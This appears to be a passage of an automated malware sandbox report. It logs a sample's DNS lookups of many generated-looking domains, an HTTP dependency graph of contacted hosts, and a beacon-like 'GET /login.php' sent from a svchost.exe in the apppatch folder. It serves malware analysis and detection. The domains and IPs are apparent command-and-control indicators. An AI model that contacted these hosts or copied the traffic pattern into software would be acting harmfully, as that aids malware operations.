                                                                                                                                                                                                              Nov 11, 2024 18:34:15.413085938 CET1.1.1.1192.168.2.80x37dcName error (3)lygysid.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.419625998 CET1.1.1.1192.168.2.80x94b3Name error (3)lyvymun.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.419881105 CET1.1.1.1192.168.2.80x9b76Name error (3)gatyzyw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.419889927 CET1.1.1.1192.168.2.80x88b9Name error (3)purylal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.419893980 CET1.1.1.1192.168.2.80x4f79Name error (3)vojydoc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.420840979 CET1.1.1.1192.168.2.80x6e70Name error (3)qetylel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.421243906 CET1.1.1.1192.168.2.80xe4faName error (3)pujydap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.421253920 CET1.1.1.1192.168.2.80x5e0aName error (3)pufypuv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.427864075 CET1.1.1.1192.168.2.80x8a68Name error (3)puvymug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.428654909 CET1.1.1.1192.168.2.80x2b08Name error (3)qegysiv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.440943956 CET1.1.1.1192.168.2.80x996cName error (3)gacynyh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.442979097 CET1.1.1.1192.168.2.80xf0f7Name error (3)qegyvag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.443612099 CET1.1.1.1192.168.2.80x9ab0Name error (3)vopyzyk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.444292068 CET1.1.1.1192.168.2.80xc82bName error (3)lykyfax.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.451111078 CET1.1.1.1192.168.2.80xb37dName error (3)gahyvab.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.451397896 CET1.1.1.1192.168.2.80x7b21Name error (3)puvyjiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.452339888 CET1.1.1.1192.168.2.80x4087Name error (3)qetytup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.456809998 CET1.1.1.1192.168.2.80x61d5Name error (3)vocyjik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.457530975 CET1.1.1.1192.168.2.80xea6bName error (3)vojybef.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.469537020 CET1.1.1.1192.168.2.80x404eName error (3)purytyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.472790003 CET1.1.1.1192.168.2.80x7c0aName error (3)lyrytyx.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.476380110 CET1.1.1.1192.168.2.80x81baName error (3)pupyxuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.477817059 CET1.1.1.1192.168.2.80x6db8Name error (3)vowyrec.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.478132010 CET1.1.1.1192.168.2.80x511cName error (3)pufycog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.478142977 CET1.1.1.1192.168.2.80xc9b6Name error (3)puzygyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.478307962 CET1.1.1.1192.168.2.80xcdeName error (3)vofycim.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.478532076 CET1.1.1.1192.168.2.80x42b3Name error (3)ganyqib.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.481940985 CET1.1.1.1192.168.2.80xf8daName error (3)qekyfep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.496309042 CET1.1.1.1192.168.2.80x3bc4Name error (3)lygyvon.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.498480082 CET1.1.1.1192.168.2.80x7d14Name error (3)gacyhuw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.499207020 CET1.1.1.1192.168.2.80x6350Name error (3)pumywov.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.501884937 CET1.1.1.1192.168.2.80x81eName error (3)qeqyrav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.725070000 CET1.1.1.1192.168.2.80x632fName error (3)vonyqof.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.725409985 CET1.1.1.1192.168.2.80xc268Name error (3)gaqyres.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.725419998 CET1.1.1.1192.168.2.80x2f00Name error (3)lyxygur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.746262074 CET1.1.1.1192.168.2.80xdcaName error (3)galyfez.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.102197886 CET1.1.1.1192.168.2.80x7b6dName error (3)qedyxuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.102468967 CET1.1.1.1192.168.2.80x53ddName error (3)lymywad.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.102480888 CET1.1.1.1192.168.2.80x1722Name error (3)volygyt.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.102490902 CET1.1.1.1192.168.2.80xd4a1Name error (3)qexyhul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.104803085 CET1.1.1.1192.168.2.80xcc85Name error (3)gadycih.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.111387014 CET1.1.1.1192.168.2.80x9873Name error (3)lysyxuj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.440197945 CET1.1.1.1192.168.2.80xca59Name error (3)vofypuf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.440316916 CET1.1.1.1192.168.2.80xb36aName error (3)gaqykoz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.444266081 CET1.1.1.1192.168.2.80x3015Name error (3)puzybeq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.445005894 CET1.1.1.1192.168.2.80xc7eName error (3)qeqykop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.447192907 CET1.1.1.1192.168.2.80x149Name error (3)gadypub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.451675892 CET1.1.1.1192.168.2.80x98e9Name error (3)vowyqik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.451685905 CET1.1.1.1192.168.2.80xfddaName error (3)volybak.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.451697111 CET1.1.1.1192.168.2.80x46f3Name error (3)lygyxux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.451708078 CET1.1.1.1192.168.2.80x7c8eName error (3)qexyfag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.452982903 CET1.1.1.1192.168.2.80x1252Name error (3)puzydog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.454585075 CET1.1.1.1192.168.2.80x21adName error (3)vofyzyc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.462398052 CET1.1.1.1192.168.2.80xf55fName error (3)lyxynej.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.466084957 CET1.1.1.1192.168.2.80xcd48Name error (3)lyxyfan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.466135025 CET1.1.1.1192.168.2.80xf738Name error (3)gaqyqiw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.469567060 CET1.1.1.1192.168.2.80x7ad9Name error (3)lymyjix.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.469772100 CET1.1.1.1192.168.2.80xaedeName error (3)qedytyg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.474808931 CET1.1.1.1192.168.2.80x844fName error (3)lyrywoj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.476383924 CET1.1.1.1192.168.2.80x588fName error (3)vocygef.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.480489969 CET1.1.1.1192.168.2.80x73a0Name error (3)qegyxup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.480940104 CET1.1.1.1192.168.2.80x20afName error (3)qeqyqul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.485008955 CET1.1.1.1192.168.2.80x34b2Name error (3)gacyfeb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.488934994 CET1.1.1.1192.168.2.80xb6e6Name error (3)vojycit.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.490031004 CET1.1.1.1192.168.2.80x600eName error (3)purywoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.491684914 CET1.1.1.1192.168.2.80xd0c8Name error (3)lysytyn.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.493402004 CET1.1.1.1192.168.2.80xa823Name error (3)ganyhus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.494117975 CET1.1.1.1192.168.2.80x37beName error (3)gatyrah.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.494692087 CET1.1.1.1192.168.2.80x7db6Name error (3)qekyvol.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.495079994 CET1.1.1.1192.168.2.80x35c7Name error (3)puvygyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.500103951 CET1.1.1.1192.168.2.80xe2fdName error (3)gahycuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.500638962 CET1.1.1.1192.168.2.80xb0eaName error (3)pufyxyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.510565042 CET1.1.1.1192.168.2.80xdc55Name error (3)qetyraq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.511639118 CET1.1.1.1192.168.2.80xdcbeName error (3)lyvygyd.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.519366980 CET1.1.1.1192.168.2.80xb1d2Name error (3)qebyhuv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.538913965 CET1.1.1.1192.168.2.80x689cName error (3)vonyjuc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.540447950 CET1.1.1.1192.168.2.80xac45Name error (3)galyvaw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.560602903 CET1.1.1.1192.168.2.80x2415Name error (3)pupyteg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.561669111 CET1.1.1.1192.168.2.80xbb68Name error (3)pujycil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.561678886 CET1.1.1.1192.168.2.80x57feName error (3)vopyrem.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.561688900 CET1.1.1.1192.168.2.80x700aName error (3)pumyjip.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.567222118 CET1.1.1.1192.168.2.80x36c1Name error (3)lykyvor.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:22.996131897 CET1.1.1.1192.168.2.80x108aNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:22.996131897 CET1.1.1.1192.168.2.80x108aNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.384951115 CET1.1.1.1192.168.2.80xe08eNo error (0)gahyqah.com162.255.119.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.384951115 CET1.1.1.1192.168.2.80xe08eNo error (0)gahyqah.com23.253.46.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.386641026 CET1.1.1.1192.168.2.80xae3bNo error (0)gatyfus.com178.162.203.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.386641026 CET1.1.1.1192.168.2.80xae3bNo error (0)gatyfus.com178.162.203.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.386641026 CET1.1.1.1192.168.2.80xae3bNo error (0)gatyfus.com178.162.203.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.386641026 CET1.1.1.1192.168.2.80xae3bNo error (0)gatyfus.com178.162.217.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.386641026 CET1.1.1.1192.168.2.80xae3bNo error (0)gatyfus.com5.79.71.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.386641026 CET1.1.1.1192.168.2.80xae3bNo error (0)gatyfus.com5.79.71.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.386641026 CET1.1.1.1192.168.2.80xae3bNo error (0)gatyfus.com85.17.31.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.386641026 CET1.1.1.1192.168.2.80xae3bNo error (0)gatyfus.com85.17.31.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.388901949 CET1.1.1.1192.168.2.80xbb6aName error (3)qekykev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.392066956 CET1.1.1.1192.168.2.80x1bb0Name error (3)lyryfyd.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.409835100 CET1.1.1.1192.168.2.80x93b7Name error (3)puvyxil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.409847021 CET1.1.1.1192.168.2.80x51daName error (3)qekyqop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.409856081 CET1.1.1.1192.168.2.80x200bName error (3)pumypog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.409864902 CET1.1.1.1192.168.2.80x3cb0Name error (3)qeqysag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.411968946 CET1.1.1.1192.168.2.80x2f28Name error (3)volykyc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.412007093 CET1.1.1.1192.168.2.80x3817Name error (3)pumyxiv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.412019968 CET1.1.1.1192.168.2.80x117Name error (3)vofymik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.412029028 CET1.1.1.1192.168.2.80xcb85Name error (3)gadyfuh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.413340092 CET1.1.1.1192.168.2.80x50c6Name error (3)vonyzuf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.413490057 CET1.1.1.1192.168.2.80x6f23Name error (3)galykes.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.413499117 CET1.1.1.1192.168.2.80xdcafName error (3)pufymoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.414829016 CET1.1.1.1192.168.2.80x782cName error (3)vowydef.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.417074919 CET1.1.1.1192.168.2.80xe8e9Name error (3)qegyqaq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.417087078 CET1.1.1.1192.168.2.80xc093Name error (3)lyxylux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.417524099 CET1.1.1.1192.168.2.80xd000Name error (3)puzywel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.417546988 CET1.1.1.1192.168.2.80xb984Name error (3)lymysan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.418284893 CET1.1.1.1192.168.2.80xe6dcName error (3)qedyfyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.419034004 CET1.1.1.1192.168.2.80x7e46Name error (3)lysynur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.420028925 CET1.1.1.1192.168.2.80xecf4Name error (3)gacyzuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.435951948 CET1.1.1.1192.168.2.80xa0dbName error (3)purydyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.436619997 CET1.1.1.1192.168.2.80x19b6Name error (3)lygymoj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.438374043 CET1.1.1.1192.168.2.80xa2ebName error (3)qedynul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.438750982 CET1.1.1.1192.168.2.80x3b9eName error (3)qexylup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.439928055 CET1.1.1.1192.168.2.80x2734Name error (3)lyxywer.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.441051960 CET1.1.1.1192.168.2.80x7d74Name error (3)gaqydeb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.443820000 CET1.1.1.1192.168.2.80x1116Name error (3)vofygum.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.444122076 CET1.1.1.1192.168.2.80xc35eName error (3)qeqyxov.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.445930004 CET1.1.1.1192.168.2.80x4f81Name error (3)pufygug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.464550018 CET1.1.1.1192.168.2.80x36f6Name error (3)lykyjad.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.468847990 CET1.1.1.1192.168.2.80x52a9Name error (3)gatyvyz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.471777916 CET1.1.1.1192.168.2.80x2d55Name error (3)pujyjav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.473299026 CET1.1.1.1192.168.2.80xd0f9Name error (3)vopybyt.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.473953962 CET1.1.1.1192.168.2.80xdb3fName error (3)qebytiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.473965883 CET1.1.1.1192.168.2.80xe72dName error (3)pupybul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.476046085 CET1.1.1.1192.168.2.80x6dd3Name error (3)gacyryw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.476298094 CET1.1.1.1192.168.2.80xc680Name error (3)gahyhob.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.478282928 CET1.1.1.1192.168.2.80xe09cName error (3)purycap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.478434086 CET1.1.1.1192.168.2.80xc083Name error (3)lyvytuj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.478611946 CET1.1.1.1192.168.2.80x3f41Name error (3)lygygin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.478790998 CET1.1.1.1192.168.2.80x5755Name error (3)vowycac.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.479163885 CET1.1.1.1192.168.2.80xd19Name error (3)ganypih.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.486980915 CET1.1.1.1192.168.2.80x480cName error (3)gaqycos.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.487101078 CET1.1.1.1192.168.2.80xc398Name error (3)puvytuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.491020918 CET1.1.1.1192.168.2.80x5160No error (0)qegyhig.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.491020918 CET1.1.1.1192.168.2.80x5160No error (0)qegyhig.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.491050959 CET1.1.1.1192.168.2.80xa324Name error (3)qetyvep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.495290041 CET1.1.1.1192.168.2.80x4582Name error (3)lyryvex.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.497071981 CET1.1.1.1192.168.2.80xb37cName error (3)qexyryl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.498925924 CET1.1.1.1192.168.2.80x48fdName error (3)vocyruk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.502402067 CET1.1.1.1192.168.2.80xb728Name error (3)vojyjof.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.530900955 CET1.1.1.1192.168.2.80x46c2No error (0)vojyqem.com77980.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.530900955 CET1.1.1.1192.168.2.80x46c2No error (0)77980.bodis.com199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.567688942 CET1.1.1.1192.168.2.80x7fe7No error (0)qetyfuv.com44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.592545986 CET1.1.1.1192.168.2.80x3246No error (0)lyvyxor.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.593472958 CET1.1.1.1192.168.2.80x55faNo error (0)puzylyp.com75.2.71.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.593472958 CET1.1.1.1192.168.2.80x55faNo error (0)puzylyp.com99.83.170.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.598146915 CET1.1.1.1192.168.2.80xeb72No error (0)lymyxid.com3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.605355978 CET1.1.1.1192.168.2.80xe0efServer failure (2)lysyfyj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.622581959 CET1.1.1.1192.168.2.80xe903No error (0)vonypom.com18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.625165939 CET1.1.1.1192.168.2.80x83eeNo error (0)vocyzit.com44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.646377087 CET1.1.1.1192.168.2.80xa4e4No error (0)galyqaz.com199.191.50.83A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.137005091 CET1.1.1.1192.168.2.80x2feNo error (0)www.gahyqah.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.137005091 CET1.1.1.1192.168.2.80x2feNo error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:04.333369017 CET1.1.1.1192.168.2.80xa35aNo error (0)gadyniw.com154.212.231.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:04.333395004 CET1.1.1.1192.168.2.80xa35aNo error (0)gadyniw.com154.212.231.82A (IP address)IN (0x0001)false

                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                              • www.google.comuser-agent:
                                                                                                                                                                                                                • qegyhig.com
                                                                                                                                                                                                                • puzylyp.com
                                                                                                                                                                                                                • lysyvan.com
                                                                                                                                                                                                                • gahyqah.com
                                                                                                                                                                                                                • lymyxid.com
                                                                                                                                                                                                                • galyqaz.com
                                                                                                                                                                                                                • lyvyxor.com
                                                                                                                                                                                                                • vojyqem.com
                                                                                                                                                                                                                • gatyfus.com
                                                                                                                                                                                                                • qetyfuv.com
                                                                                                                                                                                                                • www.gahyqah.com
                                                                                                                                                                                                                • vonypom.com
                                                                                                                                                                                                                • vocyzit.com
                                                                                                                                                                                                                • gadyniw.com
                                                                                                                                                                                                                • pupydeq.com
                                                                                                                                                                                                                • lygynud.com
                                                                                                                                                                                                                • pupycag.com
                                                                                                                                                                                                                • lyrysor.com
                                                                                                                                                                                                                • 106.15.232.163:8000
                                                                                                                                                                                                                • qexyhuv.com
                                                                                                                                                                                                                • galynuh.com
                                                                                                                                                                                                                • vofycot.com
                                                                                                                                                                                                                • lyxynyx.com
                                                                                                                                                                                                                • qegyval.com
                                                                                                                                                                                                                • gadyciz.com
                                                                                                                                                                                                                • ww16.vofycot.com
                                                                                                                                                                                                                • ww25.lyxynyx.com
                                                                                                                                                                                                                • qetyhyg.com
                                                                                                                                                                                                                • gatyhub.com
                                                                                                                                                                                                                • lygyvuj.com
                                                                                                                                                                                                                • gahyhiz.com

                                                                                                                                                                                                              HTTP Packets

                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              0192.168.2.849707162.255.119.102807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.359447002 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
